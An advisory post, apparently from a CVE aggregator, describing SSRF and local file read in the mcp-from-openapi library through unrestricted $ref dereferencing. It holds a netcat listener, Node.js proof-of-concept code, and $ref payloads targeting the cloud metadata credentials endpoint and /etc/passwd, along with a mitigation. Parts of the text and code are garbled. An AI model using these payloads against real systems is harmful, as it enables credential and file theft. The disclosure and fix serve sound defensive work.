mcp-from-openapi, SSRF and Local File Read via Dereferencing, No CVE (Critical)

Listen to this Post

The vulnerability exists in the `mcp-from-openapi` library (versions <=2.1.2) due to unsafe handling of `$ref` pointers in OpenAPI specifications. When `OpenAPIToolGenerator.initialize()` is called (index.js lines 870-875), it uses `@apidevtools/json-schema-ref-parser` to dereference the document via this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(JSON.parse(JSON.stringify(this.document))). No options are passed to .dereference(), meaning no URL allowlist, no custom resolvers, and no protocol restrictions are applied. The default behavior of `json-schema-ref-parser` is to fetch any resource pointed to by a $ref, including `http://`, `https://`, and `file://` URIs. An attacker can craft a malicious OpenAPI specification where a `$ref` points to an internal network address (e.g., http://169.254.169.254/latest/meta-data/`), a cloud metadata endpoint, or a local file (e.g.,file:///etc/passwd). Duringinitialize()`, the library fetches that resource without validation. This leads to two primary attack vectors: Server-Side Request Forgery (SSRF) allowing internal service probing and cloud credential theft, and local file read via the `file://` protocol. The attack requires no privileges; the attacker only needs to supply the malicious OpenAPI spec to any application using the library. The proof of concept shows that an attacker-controlled HTTP server receives a GET request when the spec is processed. No CVE ID has been assigned to this issue as of the ‘s publication.
Platform: Node.js library
Version: <=2.1.2
Vulnerability: SSRF & LFI
Severity: Critical
date: 2026-04-09

Prediction: Within 30 days

What Undercode Say:

Test SSRF with local HTTP server
nc -lvp 9997
PoC using Node.js to trigger dereference
const { OpenAPIToolGenerator } = require('mcp-from-openapi');
const spec = { openapi:'3.0.0', info:{'Evil',version:'1.0'}, paths:{'/test':{get:{operationId:'getTest',responses:{'200':{description:'OK',content:{'application/json':{schema:{'$ref':'http://127.0.0.1:9997/ssrf'}}}}}}}};
new OpenAPIToolGenerator(spec,{validate:false}).initialize();

Exploit:

{
"$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
{
"$ref": "file:///etc/passwd"
}

Protection from this CVE:

Pass resolver options to `.dereference()` to disable `file://` and restrict HTTP/HTTPS to an allowlist, or set `resolve: { file: false, http: false, https: false }` to block all external references.

Impact:

  • Cloud metadata credential theft (AWS/GCP/Azure)
  • Internal network scanning and service probing
  • Arbitrary local file disclosure via `file://`
    – No authentication required; low attack complexity

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top